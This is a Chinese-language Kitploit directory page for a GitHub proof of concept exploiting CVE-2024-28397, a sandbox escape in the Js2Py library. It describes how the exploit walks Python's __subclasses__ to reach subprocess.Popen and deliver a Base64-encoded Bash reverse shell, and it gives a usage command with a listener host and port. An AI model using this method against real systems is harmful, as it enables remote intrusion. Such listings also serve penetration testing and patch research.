Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-28397-Js2Py-RCE — 此仓库包含针对 CVE-2024-28397 的概念验证(PoC),该漏洞存在于 js2py 库中,允许通过沙箱逃逸实现远程代码执行。 | Kitploit
工具/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具Payload 开发
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

此仓库包含针对 CVE-2024-28397 的概念验证(PoC),该漏洞存在于 js2py 库中,允许通过沙箱逃逸实现远程代码执行。

查看仓库
211个月前尚未审核
分享

CVE-2024-28397-Js2Py-RCE

描述

此仓库包含针对 CVE-2024-28397 的基于 Python 的概念验证(PoC)代码,该漏洞是 Python 的 Js2Py JavaScript 解释器中的沙箱逃逸漏洞。 当目标应用程序通过 Js2Py 评估不受信任的 JS 代码时,攻击者可以逃逸沙箱并执行任意 Python 代码。这可用于在易受攻击的系统上实现远程代码执行(RCE)和反弹 shell。

此漏洞利用工具的灵感来自 Marven11 的 CVE-2024-28397-js2py-Sandbox-Escape 项目。


免责声明

此脚本仅用于教育和授权渗透测试目的。未经授权将本脚本用于您不拥有或未经明确许可进行测试的系统,属于非法和不道德行为。作者不对因使用本脚本造成的任何滥用或损害承担责任。


关于漏洞

  • CVE 编号:CVE-2024-28397
  • 组件:Js2Py 沙箱逃逸
  • 影响:通过 __class__.__base__.__subclasses__ 无限制访问 Python 的对象模型,从而导致任意代码执行
  • 攻击向量:远程(通过暴露的、评估用户控制 JavaScript 的 HTTP 接口)

功能

  • 通过 Python RCE 自动投递反弹 shell 载荷
  • 支持内联 Base64 编码的 shell 命令执行
  • 内置带基本 PTY 稳定功能的反弹 shell 监听器
  • 清晰的输出格式
  • 轻量级且零依赖(仅需 requests)

环境要求

  • Python 3.x
  • requests 模块(pip install requests)
  • Linux 系统(用于 /dev/tcp 反弹 shell)
  • 运行存在漏洞的 Js2Py 实现的目标

用法

root@kitploit:~
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target:存在漏洞的 Web 应用端点的完整 URL
  • --lhost:您的本地 IP 地址(用于反弹 shell)
  • --lport:接收 shell 的本地端口

工作原理

  1. 脚本准备一个 Bash 反弹 shell,进行 Base64 编码,并将其注入 JavaScript 载荷中。
  2. JS 载荷使用 __class__.__base__.__subclasses__() 遍历 Python 对象树,以找到 subprocess.Popen。
  3. 它使用 Popen 对 shell 进行解码并执行。
  4. 攻击者的机器接收反弹 shell 并自动进行稳定处理。
下载工具